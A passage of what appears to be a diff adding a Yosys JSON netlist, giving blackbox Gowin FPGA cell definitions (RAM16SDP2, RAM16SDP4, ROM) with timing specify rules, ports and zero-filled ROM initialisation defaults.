], + "EN": [ "1" ], + "SRC": [ 8, 9, 10, 11 ] + } + }, + "$specify$167": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1151.2-1151.30" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 13 ], + "DST_EN": [ "1" ], + "SRC": [ 3 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$168": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1152.2-1152.31" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 13 ], + "DST_EN": [ "1" ], + "SRC": [ 12 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$169": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000100", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1153.2-1153.31" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 13 ], + "DST_EN": [ "1" ], + "SRC": [ 4, 5, 6, 7 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$170": { + "hide_name": 1, + "type": "$specify3", + "parameters": { + "DAT_DST_PEN": "0", + "DAT_DST_POL": "0", + "DST_WIDTH": "00000000000000000000000000000001", + "EDGE_EN": "1", + "EDGE_POL": "1", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001000110101", + "T_FALL_MIN": "00000000000000000000001000110101", + "T_FALL_TYP": "00000000000000000000001000110101", + "T_RISE_MAX": "00000000000000000000000111011010", + "T_RISE_MIN": "00000000000000000000000111011010", + "T_RISE_TYP": "00000000000000000000000111011010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1154.2-1154.44" + }, + "port_directions": { + "DAT": "input", + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DAT": [ "x" ], + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 13 ] + } + } + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1146.7-1146.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1144.7-1144.9" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1145.8-1145.10" + } + }, + "RAD": { + "hide_name": 0, + "bits": [ 8, 9, 10, 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1143.13-1143.16" + } + }, + "WAD": { + "hide_name": 0, + "bits": [ 4, 5, 6, 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1142.13-1142.16" + } + }, + "WRE": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1147.7-1147.10" + } + } + } + }, + "RAM16SDP2": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1174.1-1211.10" + }, + "parameter_default_values": { + "INIT_0": "0000000000000000", + "INIT_1": "0000000000000000" + }, + "ports": { + "DO": { + "direction": "output", + "bits": [ 2, 3 ] + }, + "DI": { + "direction": "input", + "bits": [ 4, 5 ] + }, + "WAD": { + "direction": "input", + "bits": [ 6, 7, 8, 9 ] + }, + "RAD": { + "direction": "input", + "bits": [ 10, 11, 12, 13 ] + }, + "WRE": { + "direction": "input", + "bits": [ 14 ] + }, + "CLK": { + "direction": "input", + "bits": [ 15 ] + } + }, + "cells": { + "$specify$171": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000010", + "FULL": "1", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000100", + "T_FALL_MAX": "00000000000000000000000110010101", + "T_FALL_MIN": "00000000000000000000000110010101", + "T_FALL_TYP": "00000000000000000000000110010101", + "T_RISE_MAX": "00000000000000000000000100001110", + "T_RISE_MIN": "00000000000000000000000100001110", + "T_RISE_TYP": "00000000000000000000000100001110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1187.2-1187.27" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2, 3 ], + "EN": [ "1" ], + "SRC": [ 10, 11, 12, 13 ] + } + }, + "$specify$172": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000010", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1188.2-1188.30" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 15 ], + "DST_EN": [ "1" ], + "SRC": [ 4, 5 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$173": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1189.2-1189.31" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 15 ], + "DST_EN": [ "1" ], + "SRC": [ 14 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$174": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000100", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1190.2-1190.31" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 15 ], + "DST_EN": [ "1" ], + "SRC": [ 6, 7, 8, 9 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$175": { + "hide_name": 1, + "type": "$specify3", + "parameters": { + "DAT_DST_PEN": "0", + "DAT_DST_POL": "0", + "DST_WIDTH": "00000000000000000000000000000010", + "EDGE_EN": "1", + "EDGE_POL": "1", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001000110101", + "T_FALL_MIN": "00000000000000000000001000110101", + "T_FALL_TYP": "00000000000000000000001000110101", + "T_RISE_MAX": "00000000000000000000000111011010", + "T_RISE_MIN": "00000000000000000000000111011010", + "T_RISE_TYP": "00000000000000000000000111011010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1191.2-1191.44" + }, + "port_directions": { + "DAT": "input", + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DAT": [ "x", "x" ], + "DST": [ 2, 3 ], + "EN": [ "1" ], + "SRC": [ 15 ] + } + } + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1183.7-1183.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 4, 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1181.13-1181.15" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 2, 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1182.14-1182.16" + } + }, + "RAD": { + "hide_name": 0, + "bits": [ 10, 11, 12, 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1180.13-1180.16" + } + }, + "WAD": { + "hide_name": 0, + "bits": [ 6, 7, 8, 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1179.13-1179.16" + } + }, + "WRE": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1184.7-1184.10" + } + } + } + }, + "RAM16SDP4": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1214.1-1259.10" + }, + "parameter_default_values": { + "INIT_0": "0000000000000000", + "INIT_1": "0000000000000000", + "INIT_2": "0000000000000000", + "INIT_3": "0000000000000000" + }, + "ports": { + "DO": { + "direction": "output", + "bits": [ 2, 3, 4, 5 ] + }, + "DI": { + "direction": "input", + "bits": [ 6, 7, 8, 9 ] + }, + "WAD": { + "direction": "input", + "bits": [ 10, 11, 12, 13 ] + }, + "RAD": { + "direction": "input", + "bits": [ 14, 15, 16, 17 ] + }, + "WRE": { + "direction": "input", + "bits": [ 18 ] + }, + "CLK": { + "direction": "input", + "bits": [ 19 ] + } + }, + "cells": { + "$specify$176": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000100", + "FULL": "1", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000100", + "T_FALL_MAX": "00000000000000000000000110010101", + "T_FALL_MIN": "00000000000000000000000110010101", + "T_FALL_TYP": "00000000000000000000000110010101", + "T_RISE_MAX": "00000000000000000000000100001110", + "T_RISE_MIN": "00000000000000000000000100001110", + "T_RISE_TYP": "00000000000000000000000100001110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1229.2-1229.27" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2, 3, 4, 5 ], + "EN": [ "1" ], + "SRC": [ 14, 15, 16, 17 ] + } + }, + "$specify$177": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000100", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1230.2-1230.30" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 19 ], + "DST_EN": [ "1" ], + "SRC": [ 6, 7, 8, 9 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$178": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1231.2-1231.31" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 19 ], + "DST_EN": [ "1" ], + "SRC": [ 18 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$179": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000100", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1232.2-1232.31" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 19 ], + "DST_EN": [ "1" ], + "SRC": [ 10, 11, 12, 13 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$180": { + "hide_name": 1, + "type": "$specify3", + "parameters": { + "DAT_DST_PEN": "0", + "DAT_DST_POL": "0", + "DST_WIDTH": "00000000000000000000000000000100", + "EDGE_EN": "1", + "EDGE_POL": "1", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001000110101", + "T_FALL_MIN": "00000000000000000000001000110101", + "T_FALL_TYP": "00000000000000000000001000110101", + "T_RISE_MAX": "00000000000000000000000111011010", + "T_RISE_MIN": "00000000000000000000000111011010", + "T_RISE_TYP": "00000000000000000000000111011010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1233.2-1233.44" + }, + "port_directions": { + "DAT": "input", + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DAT": [ "x", "x", "x", "x" ], + "DST": [ 2, 3, 4, 5 ], + "EN": [ "1" ], + "SRC": [ 19 ] + } + } + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1225.7-1225.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 6, 7, 8, 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1223.13-1223.15" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1224.14-1224.16" + } + }, + "RAD": { + "hide_name": 0, + "bits": [ 14, 15, 16, 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1222.13-1222.16" + } + }, + "WAD": { + "hide_name": 0, + "bits": [ 10, 11, 12, 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1221.13-1221.16" + } + }, + "WRE": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1226.7-1226.10" + } + } + } + }, + "ROM": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:196.1-272.10" + }, + "parameter_default_values": { + "BIT_WIDTH": "00000000000000000000000000100000", + "BLK_SEL": "000", + "INIT_RAM_00": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": 